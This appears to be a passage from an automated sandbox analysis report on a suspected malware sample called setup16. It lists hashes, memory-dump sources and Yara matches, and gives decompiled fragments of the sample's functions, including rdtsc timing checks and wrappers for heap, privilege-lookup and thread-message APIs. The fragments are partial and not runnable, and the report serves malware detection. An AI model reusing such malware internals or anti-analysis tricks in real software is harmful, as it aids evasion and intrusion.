                                                                                                                                                                                                        • Opcode ID: 7bd908c73b1c739434934ae339fa4f3595617dcb6e22d6db5be4a83b2862d177
                                                                                                                                                                                                        • Instruction ID: af2ace217a8f004518094fdfa71377f7af0fd04accf8a79b9bb6b4a859934a53
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bd908c73b1c739434934ae339fa4f3595617dcb6e22d6db5be4a83b2862d177
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB90027120145402F1006169481470B040597D0346F51C411A1155556D8665E85175B1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 44ed76f30e9cadf88b18c9c5d6ae67f8a7204a5ed0551e06553f310c13a36903
                                                                                                                                                                                                        • Instruction ID: e383e50bc64837e4e99f22d2efab8e470485f6d37130676e3cae41df82cd657a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44ed76f30e9cadf88b18c9c5d6ae67f8a7204a5ed0551e06553f310c13a36903
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA90027120105802F1807169440464A040597D1345F91C415A0016655DCA55EA5977E1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: b19000c904187937fbe468e33bf9046907c94a1448308ebc9f3187dab09a2ee8
                                                                                                                                                                                                        • Instruction ID: 2daa4218b9547c219c973501fe341601a019aa57414bb4bb593e02165a76d1d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b19000c904187937fbe468e33bf9046907c94a1448308ebc9f3187dab09a2ee8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5A90026121185042F20065794C14B07040597D0347F51C515A0145555CC955E8616561
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A097A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 5946b81064c39d60b0660f7dec45df63228781696d995a017eff1608c33ed500
                                                                                                                                                                                                        • Instruction ID: 0d156aad8b18d1773cfae200a1183faa4415f208c058e9f6f3d8d7b37660c00a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5946b81064c39d60b0660f7dec45df63228781696d995a017eff1608c33ed500
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6590026130105003F140716954186064405E7E1345F51D411E0405555CD955E8566262
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 69f707756fafc6a23745e7938db515a9f8c1e13d3b588429d4f8e0cc84a53d28
                                                                                                                                                                                                        • Instruction ID: 5d7b85f0d2e3cad714ef8ec828f94f1403c9cc65167a3d423a085c490df4023e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 69f707756fafc6a23745e7938db515a9f8c1e13d3b588429d4f8e0cc84a53d28
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0790026921305002F1807169540860A040597D1246F91D815A0006559CC955E8696361
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 41b98dac4144640f2b9381aada2f0dd3e82415a43e98292ed5bd863f040c4424
                                                                                                                                                                                                        • Instruction ID: a52f302b82bde8233fb3b1eba8e626f1c29a2272dc98473062d24c3e96de0962
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41b98dac4144640f2b9381aada2f0dd3e82415a43e98292ed5bd863f040c4424
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF90027131119402F11061698404706040597D1245F51C811A0815559D86D5E8917162
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A09710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: e13a94569e2b855c0bc3a02461d341569cf8a23cbe4e89086ae0f67481d7dd27
                                                                                                                                                                                                        • Instruction ID: 4ad6e0be3be164bc1a4447a594f0d9bdb5aa3926180d382aa586a8cd20f0d880
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e13a94569e2b855c0bc3a02461d341569cf8a23cbe4e89086ae0f67481d7dd27
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C90027120105402F10065A95408646040597E0345F51D411A5015556EC6A5E8917171
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00408ED0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00408ED0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407210(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407420( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041BF30( &_v284, 0x104);
						E0041C5A0( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00415A40(E004159E0(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x18; // 0x5e14c483
						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407450( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004074D0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
					_t20 = _t52 + 0x35; // 0xffff43e8
					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                                                                                                                                                        0x00408edb
                                                                                                                                                                                                        0x00408ee3
                                                                                                                                                                                                        0x00408ee5
                                                                                                                                                                                                        0x00408eea
                                                                                                                                                                                                        0x00408eef
                                                                                                                                                                                                        0x00408f02
                                                                                                                                                                                                        0x00408f07
                                                                                                                                                                                                        0x00408f10
                                                                                                                                                                                                        0x00408f1c
                                                                                                                                                                                                        0x00408f2f
                                                                                                                                                                                                        0x00408f34
                                                                                                                                                                                                        0x00408f37
                                                                                                                                                                                                        0x00408f40
                                                                                                                                                                                                        0x00408f52
                                                                                                                                                                                                        0x00408f57
                                                                                                                                                                                                        0x00408f5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00408f5e
                                                                                                                                                                                                        0x00408f62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00408f64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00408f62
                                                                                                                                                                                                        0x00408f66
                                                                                                                                                                                                        0x00408f69
                                                                                                                                                                                                        0x00408f6f
                                                                                                                                                                                                        0x00408f71
                                                                                                                                                                                                        0x00408f7c
                                                                                                                                                                                                        0x00408f81
                                                                                                                                                                                                        0x00408f84
                                                                                                                                                                                                        0x00408f91
                                                                                                                                                                                                        0x00408f9c
                                                                                                                                                                                                        0x00408f9e
                                                                                                                                                                                                        0x00408fa4
                                                                                                                                                                                                        0x00408fa8
                                                                                                                                                                                                        0x00408fab
                                                                                                                                                                                                        0x00408fab
                                                                                                                                                                                                        0x00408fb2
                                                                                                                                                                                                        0x00408fb5
                                                                                                                                                                                                        0x00408fba
                                                                                                                                                                                                        0x00408fc7
                                                                                                                                                                                                        0x00408ef6
                                                                                                                                                                                                        0x00408ef6
                                                                                                                                                                                                        0x00408ef6

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: b77683e0dbd8a0247fb8733bf576a5c0d80217aef466204e60f60e1be2e19e6b
                                                                                                                                                                                                        • Instruction ID: 911db63d92bb27313539f87812f39d7602e647c51c5309350fa93bcc7f5e98a2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b77683e0dbd8a0247fb8733bf576a5c0d80217aef466204e60f60e1be2e19e6b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F210C72D4020957CB24D6749D42AFB73ACAB54314F44057FF989A3181FA38BB8987A6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A652 Relevance: 3.0, APIs: 2, Instructions: 31memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00415186,?,004158FF,004158FF,?,00415186,?,?,?,?,?,00000000,00409113,?), ref: 0041A60D
                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateExitHeapProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1054155344-0
                                                                                                                                                                                                        • Opcode ID: 9451dd0752b5382c7f29d9aed3c9fc63208ce9169560601e0ed6cecab610ff06
                                                                                                                                                                                                        • Instruction ID: 71cdfa2b8d767b4948aff1fc43252422cf5cafa46dae2d698cfdd97f2227886b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9451dd0752b5382c7f29d9aed3c9fc63208ce9169560601e0ed6cecab610ff06
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B6F027716112047FD724DF64CC86DD73BB8DF45320F144599F98C9F105C534A94987A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00407679 Relevance: 1.6, APIs: 1, Instructions: 59threadwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 200 407679-40767f 201 407681-4076ca call 41bf80 call 41cb60 call 40a140 call 415aa0 200->201 202 4076d6-4076de PostThreadMessageW 200->202 207 4076fe-407702 201->207 216 4076cc-4076d4 201->216 203 4076e0-4076fa call 4098a0 202->203 204 4076fd 202->204 203->204 204->207 216->202
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00407679(signed int __edx, void* _a4, void* _a12) {
				void* _v67;
				void* _v68;
				signed int _v515939604;
				signed int _t22;

				_t22 = __edx;
				_t1 =  &_v515939604;
				 *_t1 = _v515939604 | __edx;
				if ( *_t1 > 0) goto L4;
			}







                                                                                                                                                                                                        0x00407679
                                                                                                                                                                                                        0x00407679
                                                                                                                                                                                                        0x00407679
                                                                                                                                                                                                        0x0040767f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                                        • Opcode ID: 09018a69f39efcc29f80d7c35a381594164644af2acc338b763096f15e9a118a
                                                                                                                                                                                                        • Instruction ID: 6a20c55526dac7e9dcd3e214c174a547746cc1695b5c95847724ab1c3cbe43b7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09018a69f39efcc29f80d7c35a381594164644af2acc338b763096f15e9a118a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8012631E803297BE720A6959C43FEE7728AF41B50F04412AFA04BA1C1E6ED7D0547EA
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00407680 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 217 407680-40768f 218 407698-4076ca call 41cb60 call 40a140 call 415aa0 217->218 219 407693 call 41bf80 217->219 226 4076cc-4076de PostThreadMessageW 218->226 227 4076fe-407702 218->227 219->218 229 4076e0-4076fa call 4098a0 226->229 230 4076fd 226->230 229->230 230->227
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00407680(void* __eflags, void* _a4, void* _a12) {
				void* _v67;
				void* _v68;
				void* _t35;

				_t35 = __eflags;
			}






                                                                                                                                                                                                        0x00407680

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                                        • Opcode ID: 41c320ad5376aa61b8f770d0f4f14c720eb2e492742a766456d2adb3a1d4fa88
                                                                                                                                                                                                        • Instruction ID: b49a75ff1ff2acd002f36703245cffc08f167651a8ee5295d5347c910167830d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 41c320ad5376aa61b8f770d0f4f14c720eb2e492742a766456d2adb3a1d4fa88
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00018831A8022877E720A6959C43FFE776C9F45B54F044119FB04BA1C1E6A9790546EE
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A773 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 245 41a773-41a79a call 41af60 247 41a79f-41a7b4 LookupPrivilegeValueW 245->247
                                                                                                                                                                                                        C-Code - Quality: 64%
                                                                                                                                                                                                        			E0041A773(void* __eax, signed int __ecx, signed int* __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t14;

				asm("insb");
				 *__edi =  *__edi | __ecx;
				asm("adc [ebp-0x75], dl");
				_t11 = _a4;
				E0041AF60( *((intOrPtr*)(_a4 + 0xa1c)), _t11, _t11 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t14;
			}




                                                                                                                                                                                                        0x0041a779
                                                                                                                                                                                                        0x0041a77b
                                                                                                                                                                                                        0x0041a77f
                                                                                                                                                                                                        0x0041a783
                                                                                                                                                                                                        0x0041a79a
                                                                                                                                                                                                        0x0041a7b0
                                                                                                                                                                                                        0x0041a7b4

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5C2,0040D5C2,00000041,00000000,?,00409185), ref: 0041A7B0
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                                                        • Opcode ID: efd3438a2bbdb0ec38c583a2479f62e3d8b5e39f456a7ae31131b06f6d99c497
                                                                                                                                                                                                        • Instruction ID: 5807d86b2677651ef97d3957be5e99a143ba6342d4f460c3d68656b7deb5192a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: efd3438a2bbdb0ec38c583a2479f62e3d8b5e39f456a7ae31131b06f6d99c497
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7FF0A0B12402086FCB10DF54CC41ED73BB9EF45254F108198FD49A7242C230E8168BE1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A5E0 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 251 41a5e0-41a611 call 41af60 RtlAllocateHeap
                                                                                                                                                                                                        C-Code - Quality: 34%
                                                                                                                                                                                                        			E0041A5E0(void* __ebx, intOrPtr _a4) {
				signed int _t7;
				void* _t8;
				void* _t10;

				_t6 = _a4;
				_t10 =  *(_a4 + 0x14);
				_t7 = E0041AF60(_t10, _t6, _t6 + 0xc8c, _t10, 0, 0x34);
				 *_t7 =  *_t7 | _t7;
				 *((intOrPtr*)(__ebx + 0x458b1455)) =  *((intOrPtr*)(__ebx + 0x458b1455)) + _t10;
				asm("adc [ebx-0x3b7cf3b3], cl");
				asm("adc al, 0x52");
				_push(_t7);
				_t8 = RtlAllocateHeap(_t10); // executed
				return _t8;
			}






                                                                                                                                                                                                        0x0041a5e3
                                                                                                                                                                                                        0x0041a5e6
                                                                                                                                                                                                        0x0041a5f7
                                                                                                                                                                                                        0x0041a5f9
                                                                                                                                                                                                        0x0041a5fb
                                                                                                                                                                                                        0x0041a601
                                                                                                                                                                                                        0x0041a607
                                                                                                                                                                                                        0x0041a60b
                                                                                                                                                                                                        0x0041a60d
                                                                                                                                                                                                        0x0041a611

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00415186,?,004158FF,004158FF,?,00415186,?,?,?,?,?,00000000,00409113,?), ref: 0041A60D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                        • Opcode ID: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                                                                                                                                                                                        • Instruction ID: 5112eb7d04df1d6e50f339e712a9d98793db7acbdec2b9c88685dfce6d12f60e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8082421df8bc89d162f2638fa4c1385792dc10d17e44cb2d46fb0fb817fbd62f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0EE01AB12002086BDB14DF49DC45E9737ACEF88654F118155BA085B241C530F9108AB5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 254 41a620-41a651 call 41af60 RtlFreeHeap
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041A620(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xc90; // 0xc90
				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                                                                                                        0x0041a62f
                                                                                                                                                                                                        0x0041a637
                                                                                                                                                                                                        0x0041a64d
                                                                                                                                                                                                        0x0041a651

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409113,?,?,00409113,00000060,00000000,00000000,?,?,00409113,?,00000000), ref: 0041A64D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                        • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                                                                                                                                                                                        • Instruction ID: e76337afa916636dc7999d0b0cc11d2e66c0cc36247d0f50dc268ede5031f4cd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14E012B1200208ABDB14EF89DC49EA737ACEF88764F118159BA085B242C630E9208AB1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0041A780 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 257 41a780-41a799 258 41a79f-41a7b4 LookupPrivilegeValueW 257->258 259 41a79a call 41af60 257->259 259->258
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E0041A780(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041AF60( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                                                                                                        0x0041a79a
                                                                                                                                                                                                        0x0041a7b0
                                                                                                                                                                                                        0x0041a7b4

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5C2,0040D5C2,00000041,00000000,?,00409185), ref: 0041A7B0
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.369660061.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_setup16.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                                                        • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
